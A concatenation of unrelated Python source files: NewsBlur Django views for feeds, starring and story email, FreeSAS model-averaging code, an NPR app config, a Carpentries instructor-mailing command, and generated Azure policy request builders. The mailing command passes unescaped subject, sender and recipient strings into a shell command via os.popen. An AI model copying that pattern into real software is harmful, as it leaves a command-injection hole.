    in_folder = request.POST.get('in_folder', '')
    to_folder = request.POST.get('to_folder', '')

    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders = user_sub_folders.move_feed_to_folder(feed_id, in_folder=in_folder,
                                                            to_folder=to_folder)
    
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')

    return dict(code=1, folders=json.decode(user_sub_folders.folders))
    
@ajax_login_required
@json.json_view
def move_folder_to_folder(request):
    folder_name = request.POST['folder_name']
    in_folder = request.POST.get('in_folder', '')
    to_folder = request.POST.get('to_folder', '')
    
    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders = user_sub_folders.move_folder_to_folder(folder_name, in_folder=in_folder, to_folder=to_folder)
    
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')

    return dict(code=1, folders=json.decode(user_sub_folders.folders))

@required_params('feeds_by_folder', 'to_folder')
@ajax_login_required
@json.json_view
def move_feeds_by_folder_to_folder(request):
    feeds_by_folder = json.decode(request.POST['feeds_by_folder'])
    to_folder = request.POST['to_folder']
    new_folder = request.POST.get('new_folder', None)

    request.user.profile.send_opml_export_email(reason="You have moved a number of feeds at once, so here's a backup just in case.")
    
    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)

    if new_folder:
        user_sub_folders.add_folder(to_folder, new_folder)
        to_folder = new_folder

    user_sub_folders = user_sub_folders.move_feeds_by_folder_to_folder(feeds_by_folder, to_folder)
    
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')

    return dict(code=1, folders=json.decode(user_sub_folders.folders))
    
@login_required
def add_feature(request):
    if not request.user.is_staff:
        return HttpResponseForbidden()

    code = -1    
    form = FeatureForm(request.POST)
    
    if form.is_valid():
        form.save()
        code = 1
        return HttpResponseRedirect(reverse('index'))
    
    return dict(code=code)
    
@json.json_view
def load_features(request):
    user = get_user(request)
    page = max(int(request.REQUEST.get('page', 0)), 0)
    logging.user(request, "~FBBrowse features: ~SBPage #%s" % (page+1))
    features = Feature.objects.all()[page*3:(page+1)*3+1].values()
    features = [{
        'description': f['description'], 
        'date': localtime_for_timezone(f['date'], user.profile.timezone).strftime("%b %d, %Y")
    } for f in features]
    return features

@ajax_login_required
@json.json_view
def save_feed_order(request):
    folders = request.POST.get('folders')
    if folders:
        # Test that folders can be JSON decoded
        folders_list = json.decode(folders)
        assert folders_list is not None
        logging.user(request, "~FBFeed re-ordering: ~SB%s folders/feeds" % (len(folders_list)))
        user_sub_folders = UserSubscriptionFolders.objects.get(user=request.user)
        user_sub_folders.folders = folders
        user_sub_folders.save()
    
    return {}

@json.json_view
def feeds_trainer(request):
    classifiers = []
    feed_id = request.REQUEST.get('feed_id')
    user = get_user(request)
    usersubs = UserSubscription.objects.filter(user=user, active=True)
    
    if feed_id:
        feed = get_object_or_404(Feed, pk=feed_id)
        usersubs = usersubs.filter(feed=feed)
    usersubs = usersubs.select_related('feed').order_by('-feed__stories_last_month')
                
    for us in usersubs:
        if (not us.is_trained and us.feed.stories_last_month > 0) or feed_id:
            classifier = dict()
            classifier['classifiers'] = get_classifiers_for_user(user, feed_id=us.feed.pk)
            classifier['feed_id'] = us.feed_id
            classifier['stories_last_month'] = us.feed.stories_last_month
            classifier['num_subscribers'] = us.feed.num_subscribers
            classifier['feed_tags'] = json.decode(us.feed.data.popular_tags) if us.feed.data.popular_tags else []
            classifier['feed_authors'] = json.decode(us.feed.data.popular_authors) if us.feed.data.popular_authors else []
            classifiers.append(classifier)
    
    user.profile.has_trained_intelligence = True
    user.profile.save()
    
    logging.user(user, "~FGLoading Trainer: ~SB%s feeds" % (len(classifiers)))
    
    return classifiers

@ajax_login_required
@json.json_view
def save_feed_chooser(request):
    is_premium = request.user.profile.is_premium
    approved_feeds = [int(feed_id) for feed_id in request.POST.getlist('approved_feeds') if feed_id]
    if not is_premium:
        approved_feeds = approved_feeds[:64]
    activated = 0
    usersubs = UserSubscription.objects.filter(user=request.user)
    
    for sub in usersubs:
        try:
            if sub.feed_id in approved_feeds:
                activated += 1
                if not sub.active:
                    sub.active = True
                    sub.save()
                    if sub.feed.active_subscribers <= 0:
                        sub.feed.count_subscribers()
            elif sub.active:
                sub.active = False
                sub.save()
        except Feed.DoesNotExist:
            pass
    
    request.user.profile.queue_new_feeds()
    request.user.profile.refresh_stale_feeds(exclude_new=True)
    
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')
    
    logging.user(request, "~BB~FW~SBFeed chooser: ~FC%s~SN/~SB%s" % (
        activated, 
        usersubs.count()
    ))
    
    return {'activated': activated}

@ajax_login_required
def retrain_all_sites(request):
    for sub in UserSubscription.objects.filter(user=request.user):
        sub.is_trained = False
        sub.save()
        
    return feeds_trainer(request)
    
@login_required
def activate_premium_account(request):
    try:
        usersubs = UserSubscription.objects.select_related('feed').filter(user=request.user)
        for sub in usersubs:
            sub.active = True
            sub.save()
            if sub.feed.premium_subscribers <= 0:
                sub.feed.count_subscribers()
                sub.feed.schedule_feed_fetch_immediately()
    except Exception, e:
        subject = "Premium activation failed"
        message = "%s -- %s\n\n%s" % (request.user, usersubs, e)
        mail_admins(subject, message, fail_silently=True)
        
    request.user.profile.is_premium = True
    request.user.profile.save()
        
    return HttpResponseRedirect(reverse('index'))

@login_required
def login_as(request):
    if not request.user.is_staff:
        logging.user(request, "~SKNON-STAFF LOGGING IN AS ANOTHER USER!")
        assert False
        return HttpResponseForbidden()
    username = request.GET['user']
    user = get_object_or_404(User, username__iexact=username)
    user.backend = settings.AUTHENTICATION_BACKENDS[0]
    login_user(request, user)
    return HttpResponseRedirect(reverse('index'))
    
def iframe_buster(request):
    logging.user(request, "~FB~SBiFrame bust!")
    return HttpResponse(status=204)

@required_params('story_id', feed_id=int)
@ajax_login_required
@json.json_view
def mark_story_as_starred(request):
    return _mark_story_as_starred(request)
    
@required_params('story_hash')
@ajax_login_required
@json.json_view
def mark_story_hash_as_starred(request):
    return _mark_story_as_starred(request)
    
def _mark_story_as_starred(request):
    code       = 1
    feed_id    = int(request.REQUEST.get('feed_id', 0))
    story_id   = request.REQUEST.get('story_id', None)
    story_hash = request.REQUEST.get('story_hash', None)
    user_tags  = request.REQUEST.getlist('user_tags')
    message    = ""
    if story_hash:
        story, _   = MStory.find_story(story_hash=story_hash)
        feed_id = story and story.story_feed_id
    else:
        story, _   = MStory.find_story(story_feed_id=feed_id, story_id=story_id)
    
    if not story:
        return {'code': -1, 'message': "Could not find story to save."}
        
    story_db = dict([(k, v) for k, v in story._data.items() 
                            if k is not None and v is not None])
    story_db.pop('user_id', None)
    story_db.pop('starred_date', None)
    story_db.pop('id', None)
    story_db.pop('user_tags', None)
    now = datetime.datetime.now()
    story_values = dict(starred_date=now, user_tags=user_tags, **story_db)
    params = dict(story_guid=story.story_guid, user_id=request.user.pk)
    starred_story = MStarredStory.objects(**params).limit(1)
    created = False
    removed_user_tags = []
    if not starred_story:
        params.update(story_values)
        starred_story = MStarredStory.objects.create(**params)
        created = True
        MActivity.new_starred_story(user_id=request.user.pk, 
                                    story_title=story.story_title, 
                                    story_feed_id=feed_id,
                                    story_id=starred_story.story_guid)
        new_user_tags = user_tags
        MStarredStoryCounts.adjust_count(request.user.pk, feed_id=feed_id, amount=1)
    else:
        starred_story = starred_story[0]
        new_user_tags = list(set(user_tags) - set(starred_story.user_tags or []))
        removed_user_tags = list(set(starred_story.user_tags or []) - set(user_tags))
        starred_story.user_tags = user_tags
        starred_story.save()
    
    for tag in new_user_tags:
        MStarredStoryCounts.adjust_count(request.user.pk, tag=tag, amount=1)
    for tag in removed_user_tags:
        MStarredStoryCounts.adjust_count(request.user.pk, tag=tag, amount=-1)
    
    if random.random() < 0.01:
        MStarredStoryCounts.schedule_count_tags_for_user(request.user.pk)
    MStarredStoryCounts.count_for_user(request.user.pk, total_only=True)
    starred_counts, starred_count = MStarredStoryCounts.user_counts(request.user.pk, include_total=True)
    if not starred_count and len(starred_counts):
        starred_count = MStarredStory.objects(user_id=request.user.pk).count()    
    
    if created:
        logging.user(request, "~FCStarring: ~SB%s (~FM~SB%s~FC~SN)" % (story.story_title[:32], starred_story.user_tags))        
    else:
        logging.user(request, "~FCUpdating starred:~SN~FC ~SB%s~SN (~FM~SB%s~FC~SN)" % (story.story_title[:32], starred_story.user_tags))
    
    return {'code': code, 'message': message, 'starred_count': starred_count, 'starred_counts': starred_counts}
    
@required_params('story_id')
@ajax_login_required
@json.json_view
def mark_story_as_unstarred(request):
    return _mark_story_as_unstarred(request)
    
@required_params('story_hash')
@ajax_login_required
@json.json_view
def mark_story_hash_as_unstarred(request):
    return _mark_story_as_unstarred(request)

def _mark_story_as_unstarred(request):
    code     = 1
    story_id = request.POST.get('story_id', None)
    story_hash = request.REQUEST.get('story_hash', None)
    starred_counts = None
    starred_story = None
    
    if story_id:
        starred_story = MStarredStory.objects(user_id=request.user.pk, story_guid=story_id)
    if not story_id or not starred_story:
        starred_story = MStarredStory.objects(user_id=request.user.pk, story_hash=story_hash or story_id)
    if starred_story:
        starred_story = starred_story[0]
        logging.user(request, "~FCUnstarring: ~SB%s" % (starred_story.story_title[:50]))
        user_tags = starred_story.user_tags
        feed_id = starred_story.story_feed_id
        MActivity.remove_starred_story(user_id=request.user.pk, 
                                       story_feed_id=starred_story.story_feed_id,
                                       story_id=starred_story.story_guid)
        starred_story.user_id = 0
        try:
            starred_story.save()
        except NotUniqueError:
            starred_story.delete()
        
        MStarredStoryCounts.adjust_count(request.user.pk, feed_id=feed_id, amount=-1)

        for tag in user_tags:
            try:
                MStarredStoryCounts.adjust_count(request.user.pk, tag=tag, amount=-1)
            except MStarredStoryCounts.DoesNotExist:
                pass
        # MStarredStoryCounts.schedule_count_tags_for_user(request.user.pk)
        MStarredStoryCounts.count_for_user(request.user.pk, total_only=True)
        starred_counts = MStarredStoryCounts.user_counts(request.user.pk)
    else:
        code = -1
    
    return {'code': code, 'starred_counts': starred_counts}

@ajax_login_required
@json.json_view
def send_story_email(request):
    code       = 1
    message    = 'OK'
    story_id   = request.POST['story_id']
    feed_id    = request.POST['feed_id']
    to_addresses = request.POST.get('to', '').replace(',', ' ').replace('  ', ' ').strip().split(' ')
    from_name  = request.POST['from_name']
    from_email = request.POST['from_email']
    email_cc   = is_true(request.POST.get('email_cc', 'true'))
    comments   = request.POST['comments']
    comments   = comments[:2048] # Separated due to PyLint
    from_address = 'share@newsblur.com'
    share_user_profile = MSocialProfile.get_user(request.user.pk)

    if not to_addresses:
        code = -1
        message = 'Please provide at least one email address.'
    elif not all(email_re.match(to_address) for to_address in to_addresses if to_addresses):
        code = -1
        message = 'You need to send the email to a valid email address.'
    elif not email_re.match(from_email):
        code = -1
        message = 'You need to provide your email address.'
    elif not from_name:
        code = -1
        message = 'You need to provide your name.'
    else:
        story, _ = MStory.find_story(feed_id, story_id)
        story   = Feed.format_story(story, feed_id, text=True)
        feed    = Feed.get_by_id(story['story_feed_id'])
        params  = {
            "to_addresses": to_addresses,
            "from_name": from_name,
            "from_email": from_email,
            "email_cc": email_cc,
            "comments": comments,
            "from_address": from_address,
            "story": story,
            "feed": feed,
            "share_user_profile": share_user_profile,
        }
        text    = render_to_string('mail/email_story.txt', params)
        html    = render_to_string('mail/email_story.xhtml', params)
        subject = '%s' % (story['story_title'])
        cc      = None
        if email_cc:
            cc = ['%s <%s>' % (from_name, from_email)]
        subject = subject.replace('\n', ' ')
        msg     = EmailMultiAlternatives(subject, text, 
                                         from_email='NewsBlur <%s>' % from_address,
                                         to=to_addresses, 
                                         cc=cc,
                                         headers={'Reply-To': '%s <%s>' % (from_name, from_email)})
        msg.attach_alternative(html, "text/html")
        try:
            msg.send()
        except boto.ses.connection.ResponseError, e:
            code = -1
            message = "Email error: %s" % str(e)
        logging.user(request, '~BMSharing story by email to %s recipient%s: ~FY~SB%s~SN~BM~FY/~SB%s' % 
                              (len(to_addresses), '' if len(to_addresses) == 1 else 's', 
                               story['story_title'][:50], feed and feed.feed_title[:50]))
        
    return {'code': code, 'message': message}

@json.json_view
def load_tutorial(request):
    if request.REQUEST.get('finished'):
        logging.user(request, '~BY~FW~SBFinishing Tutorial')
        return {}
    else:
        newsblur_feed = Feed.objects.filter(feed_address__icontains='blog.newsblur.com').order_by('-pk')[0]
        logging.user(request, '~BY~FW~SBLoading Tutorial')
        return {
            'newsblur_feed': newsblur_feed.canonical()
        }

__author__ = "Guillaume"
__license__ = "MIT"
__copyright__ = "2015, ESRF"

import numpy
from freesas.model import SASModel


class Grid:
    """
    This class is used to create a grid which include all the input models
    """
    def __init__(self, inputfiles):
        """
        :param inputfiles: list of pdb files needed for averaging
        """
        self.inputs = inputfiles
        self.size = []
        self.nbknots = None
        self.radius = None
        self.coordknots = []

    def __repr__(self):
        return "Grid with %i knots"%self.nbknots

    def spatial_extent(self):
        """
        Calculate the maximal extent of input models
        
        :return self.size: 6-list with x,y,z max and then x,y,z min
        """
        atoms = []
        models_fineness = []
        for files in self.inputs:
            m = SASModel(files)
            if len(atoms)==0:
                atoms = m.atoms
            else:
                atoms = numpy.append(atoms, m.atoms, axis=0)
            models_fineness.append(m.fineness)
        mean_fineness = sum(models_fineness) / len(models_fineness)

        coordmin = atoms.min(axis=0) - mean_fineness
        coordmax = atoms.max(axis=0) + mean_fineness
        self.size = [coordmax[0],coordmax[1],coordmax[2],coordmin[0],coordmin[1],coordmin[2]]

        return self.size

    def calc_radius(self, nbknots=None):
        """
        Calculate the radius of each point of a hexagonal close-packed grid, 
        knowing the total volume and the number of knots in this grid.

        :param nbknots: number of knots wanted for the grid
        :return radius: the radius of each knot of the grid
        """
        if len(self.size)==0:
            self.spatial_extent()
        nbknots = nbknots if nbknots is not None else 5000
        size = self.size
        dx = size[0] - size[3]
        dy = size[1] - size[4]
        dz = size[2] - size[5]
        volume = dx * dy * dz

        density = numpy.pi / (3*2**0.5)
        radius = ((3 /( 4 * numpy.pi)) * density * volume / nbknots)**(1.0/3)
        self.radius = radius

        return radius

    def make_grid(self):
        """
        Create a grid using the maximal size and the radius previously computed.
        The geometry used is a face-centered cubic lattice (fcc).

        :return knots: 2d-array, coordinates of each dot of the grid. Saved as self.coordknots.
        """
        if len(self.size)==0:
            self.spatial_extent()
        if self.radius is None:
            self.calc_radius()

        radius = self.radius
        a = numpy.sqrt(2.0)*radius

        xmax = self.size[0]
        xmin = self.size[3]
        ymax = self.size[1]
        ymin = self.size[4]
        zmax = self.size[2]
        zmin = self.size[5]

        x = 0.0
        y = 0.0
        z = 0.0

        xlist = []
        ylist = []
        zlist = []
        knots = numpy.empty((1,4), dtype="float")
        while (zmin + z) <= zmax:
            zlist.append(z)
            z += a
        while (ymin + y) <= ymax:
            ylist.append(y)
            y += a
        while (xmin + x) <= xmax:
            xlist.append(x)
            x += a

        for i in range(len(zlist)):
            z = zlist[i]
            if i % 2 ==0:
                for j in range(len(xlist)):
                    x = xlist[j]
                    if j % 2 == 0:
                        for y in ylist[0:-1:2]:
                            knots = numpy.append(knots, [[xmin+x, ymin+y, zmin+z, 0.0]], axis=0)
                    else:
                        for y in ylist[1:-1:2]:
                            knots = numpy.append(knots, [[xmin+x, ymin+y, zmin+z, 0.0]], axis=0)
            else:
                for j in range(len(xlist)):
                    x = xlist[j]
                    if j % 2 == 0:
                        for y in ylist[1:-1:2]:
                            knots = numpy.append(knots, [[xmin+x, ymin+y, zmin+z, 0.0]], axis=0)
                    else:
                        for y in ylist[0:-1:2]:
                            knots = numpy.append(knots, [[xmin+x, ymin+y, zmin+z, 0.0]], axis=0)

        knots = numpy.delete(knots, 0, axis=0)
        self.nbknots = knots.shape[0]
        self.coordknots = knots

        return knots


class AverModels():
    """
    Provides tools to create an averaged models using several aligned dummy atom models
    """
    def __init__(self, inputfiles, grid):
        """
        :param inputfiles: list of pdb files of aligned models
        :param grid: 2d-array coordinates of each point of a grid, fourth column full of zeros
        """
        self.inputfiles = inputfiles
        self.models = []
        self.header = []
        self.radius = None
        self.atoms = []
        self.grid = grid

    def __repr__(self):
        return "Average SAS model with %i atoms"%len(self.atoms)

    def read_files(self, reference=None):
        """
        Read all the pdb file in the inputfiles list, creating SASModels.
        The SASModels created are save in a list, the reference model is the first model in the list.

        :param reference: position of the reference model file in the inputfiles list
        """
        ref = reference if reference is not None else 0
        inputfiles = self.inputfiles

        models = []
        models.append(SASModel(inputfiles[ref]))
        for i in range(len(inputfiles)):
            if i==ref:
                continue
            else:
                models.append(SASModel(inputfiles[i]))
        self.models = models

        return models

    def calc_occupancy(self, griddot):
        """
        Assign an occupancy and a contribution factor to the point of the grid.

        :param griddot: 1d-array, coordinates of a point of the grid
        :return tuple: 2-tuple containing (occupancy, contribution)
        """
        occ = 0.0
        contrib = 0
        for model in self.models:
            f = model.fineness
            for i in range(model.atoms.shape[0]):
                dx = model.atoms[i, 0] - griddot[0]
                dy = model.atoms[i, 1] - griddot[1]
                dz = model.atoms[i, 2] - griddot[2]
                dist = dx * dx + dy * dy + dz * dz
                add = max(1 - (dist / f), 0)
                if add != 0:
                    contrib += 1
                    occ += add
        return occ, contrib

    def assign_occupancy(self):
        """
        For each point of the grid, total occupancy and contribution factor are computed and saved.
        The grid is then ordered with decreasing value of occupancy.
        The fourth column of the array correspond to the occupancy of the point and the fifth to 
        the contribution for this point.

        :return sortedgrid: 2d-array, coordinates of each point of the grid
        """
        grid = self.grid
        nbknots = grid.shape[0]
        grid = numpy.append(grid, numpy.zeros((nbknots, 1), dtype="float"), axis=1)

        for i in range(nbknots):
            occ, contrib = self.calc_occupancy(grid[i, 0:3])
            grid[i, 3] = occ
            grid[i, 4] = contrib

        order = numpy.argsort(grid, axis=0)[:, -2]
        sortedgrid = numpy.empty_like(grid)
        for i in range(nbknots):
            sortedgrid[nbknots - i - 1, :] = grid[order[i], :]

        return sortedgrid

    def make_header(self):
        """
        Create the layout of the pdb file for the averaged model.
        """
        header = []
        header.append("Number of files averaged : %s\n"%len(self.inputfiles))
        for i in self.inputfiles:
            header.append(i + "\n")
        header.append("Total number of dots in the grid : %s\n"%self.grid.shape[0])

        decade = 1
        for i in range(self.grid.shape[0]):
            line = "ATOM         CA  ASP    1                                    20.00   2 201\n"
            line = line[:7] + "%4.i"%(i + 1) + line[11:]
            if not (i + 1) % 10:
                decade += 1
            line = line[:21] + "%4.i"%decade + line[25:]
            header.append(line)
        self.header = header
        return header

    def save_aver(self, filename):
        """
        Save the position of each occupied dot of the grid, its occupancy and its contribution 
        in a pdb file.

        :param filename: name of the pdb file to write
        """
        if len(self.header) == 0:
            self.make_header()
        assert self.grid.shape[-1] == 5

        nr = 0
        with open(filename, "w") as pdbout:
            for line in self.header:
                if line.startswith("ATOM"):
                    if nr < self.grid.shape[0] and self.grid[nr, 4] != 0:
                        coord = "%8.3f%8.3f%8.3f" % tuple(self.grid[nr, 0:3])
                        occ = "%6.2f" % self.grid[nr, 3]
                        contrib = "%2.f" % self.grid[nr, 4]
                        line = line[:30] + coord + occ + line[60:66] + contrib + line[68:]
                    else:
                        line = ""
                    nr += 1
                pdbout.write(line)

#!/usr/bin/env python

"""
Project-wide application configuration.

DO NOT STORE SECRETS, PASSWORDS, ETC. IN THIS FILE.
They will be exposed to users. Use environment variables instead.
See get_secrets() below for a fast way to access them.
"""

import os

"""
NAMES
"""
# Project name used for display
PROJECT_NAME = 'quotable'

# Project name in urls
# Use dashes, not underscores!
PROJECT_SLUG = 'quotable'

# The name of the repository containing the source
REPOSITORY_NAME = 'quotable'
REPOSITORY_URL = 'git@github.com:nprapps/%s.git' % REPOSITORY_NAME
REPOSITORY_ALT_URL = None # 'git@bitbucket.org:nprapps/%s.git' % REPOSITORY_NAME'

# The name to be used in paths on the server
PROJECT_FILENAME = 'quotable'

"""
DEPLOYMENT
"""
FILE_SERVER = 'tools.apps.npr.org'
S3_BUCKET = 'tools.apps.npr.org'
ASSETS_S3_BUCKET = 'assets.apps.npr.org'

# These variables will be set at runtime. See configure_targets() below
DEBUG = True

"""
COPY EDITING
"""
COPY_GOOGLE_DOC_KEY = '0AlXMOHKxzQVRdHZuX1UycXplRlBfLVB0UVNldHJYZmc'

"""
SHARING
"""
PROJECT_DESCRIPTION = 'An opinionated project template for (mostly) server-less apps.'
SHARE_URL = 'http://%s/%s/' % (S3_BUCKET, PROJECT_SLUG)

TWITTER = {
    'TEXT': PROJECT_NAME,
    'URL': SHARE_URL,
    # Will be resized to 120x120, can't be larger than 1MB
    'IMAGE_URL': ''
}

FACEBOOK = {
    'TITLE': PROJECT_NAME,
    'URL': SHARE_URL,
    'DESCRIPTION': PROJECT_DESCRIPTION,
    # Should be square. No documented restrictions on size
    'IMAGE_URL': TWITTER['IMAGE_URL'],
    'APP_ID': '138837436154588'
}

GOOGLE = {
    # Thumbnail image for Google News / Search.
    # No documented restrictions on resolution or size
    'IMAGE_URL': TWITTER['IMAGE_URL']
}

NPR_DFP = {
    'STORY_ID': '203618536',
    'TARGET': 'News_NPR_News_Investigations',
    'ENVIRONMENT': 'NPRTEST',
    'TESTSERVER': 'true'
}

"""
SERVICES
"""
GOOGLE_ANALYTICS_ID = 'UA-5828686-4'


import os
import logging

from django.core.management.base import BaseCommand
from django.core.mail import send_mail
from django.template.loader import get_template

from workshops.models import Badge, Person, Role

logger = logging.getLogger()


class Command(BaseCommand):
    help = 'Report instructors activity.'

    def add_arguments(self, parser):
        parser.add_argument(
            '--send-out-for-real', action='store_true', default=False,
            help='Send information to the instructors.',
        )
        parser.add_argument(
            '--no-may-contact-only', action='store_true', default=False,
            help='Include instructors not willing to be contacted.',
        )
        parser.add_argument(
            '--django-mailing', action='store_true', default=False,
            help='Use Django mailing system. This requires some environmental '
                 'variables to be set, see `settings.py`.',
        )
        parser.add_argument(
            '-s', '--sender', action='store',
            default='workshops@carpentries.org',
            help='E-mail used in "from:" field.',
        )

    def foreign_tasks(self, tasks, person, roles):
        """List of other instructors' tasks, per event."""
        return [
            task.event.task_set.filter(role__in=roles)
                               .exclude(person=person)
                               .select_related('person')
            for task in tasks
        ]

    def fetch_activity(self, may_contact_only=True):
        roles = Role.objects.filter(name__in=['instructor', 'helper'])
        instructor_badges = Badge.objects.instructor_badges()

        instructors = Person.objects.filter(badges__in=instructor_badges)
        instructors = instructors.exclude(email__isnull=True)
        if may_contact_only:
            instructors = instructors.exclude(may_contact=False)

        # let's get some things faster
        instructors = instructors.select_related('airport') \
                                 .prefetch_related('task_set', 'lessons',
                                                   'award_set', 'badges')

        # don't repeat the records
        instructors = instructors.distinct()

        result = []
        for person in instructors:
            tasks = person.task_set.filter(role__in=roles) \
                                   .select_related('event', 'role')
            record = {
                'person': person,
                'lessons': person.lessons.all(),
                'instructor_awards': person.award_set.filter(
                    badge__in=person.badges.instructor_badges()
                ),
                'tasks': zip(tasks,
                             self.foreign_tasks(tasks, person, roles)),
            }
            result.append(record)

        return result

    def make_message(self, record):
        tmplt = get_template('mailing/instructor_activity.txt')
        return tmplt.render(context=record)

    def subject(self, record):
        # in future we can vary the subject depending on the record details
        return 'Updating your Software Carpentry information'

    def recipient(self, record):
        return record['person'].email

    def send_message(self, subject, message, sender, recipient, for_real=False,
                     django_mailing=False):
        if for_real:
            if django_mailing:
                send_mail(subject, message, sender, [recipient])

            else:
                command = 'mail -s "{subject}" -r {sender} {recipient}'.format(
                    subject=subject,
                    sender=sender,
                    recipient=recipient,
                )

                writer = os.popen(command, 'w')
                writer.write(message)
                writer.close()

        if self.verbosity >= 2:
            # write only a header
            self.stdout.write('-' * 40 + '\n')
            self.stdout.write('To: {}\n'.format(recipient))
            self.stdout.write('Subject: {}\n'.format(subject))
            self.stdout.write('From: {}\n'.format(sender))
        if self.verbosity >= 3:
            # write whole message out
            self.stdout.write(message + '\n')

    def handle(self, *args, **options):
        # default is dummy run - only actually send mail if told to
        send_for_real = options['send_out_for_real']

        # by default include only instructors who have `may_contact==True`
        no_may_contact_only = options['no_may_contact_only']

        # use mailing options from settings.py or the `mail` system command?
        django_mailing = options['django_mailing']

        # verbosity option is added by Django
        self.verbosity = int(options['verbosity'])

        sender = options['sender']

        results = self.fetch_activity(not no_may_contact_only)

        for result in results:
            message = self.make_message(result)
            subject = self.subject(result)
            recipient = self.recipient(result)
            self.send_message(subject, message, sender, recipient,
                              for_real=send_for_real,
                              django_mailing=django_mailing)

        if self.verbosity >= 1:
            self.stdout.write('Sent {} emails.\n'.format(len(results)))

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings

from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer

from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]

_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False

def build_delete_request(
    scope: str,
    policy_assignment_name: str,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}')
    path_format_arguments = {
        "scope": _SERIALIZER.url("scope", scope, 'str', skip_quote=True),
        "policyAssignmentName": _SERIALIZER.url("policy_assignment_name", policy_assignment_name, 'str'),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="DELETE",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )


def build_create_request(
    scope: str,
    policy_assignment_name: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    content_type = kwargs.pop('content_type', None)  # type: Optional[str]

    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}')
    path_format_arguments = {
        "scope": _SERIALIZER.url("scope", scope, 'str', skip_quote=True),
        "policyAssignmentName": _SERIALIZER.url("policy_assignment_name", policy_assignment_name, 'str'),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    if content_type is not None:
        header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="PUT",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        json=json,
        content=content,
        **kwargs
    )


def build_get_request(
    scope: str,
    policy_assignment_name: str,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}')
    path_format_arguments = {
        "scope": _SERIALIZER.url("scope", scope, 'str', skip_quote=True),
        "policyAssignmentName": _SERIALIZER.url("policy_assignment_name", policy_assignment_name, 'str'),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )


def build_list_for_resource_group_request(
    resource_group_name: str,
    subscription_id: str,
    *,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Authorization/policyAssignments')
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    if filter is not None:
        query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str', skip_quote=True)
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
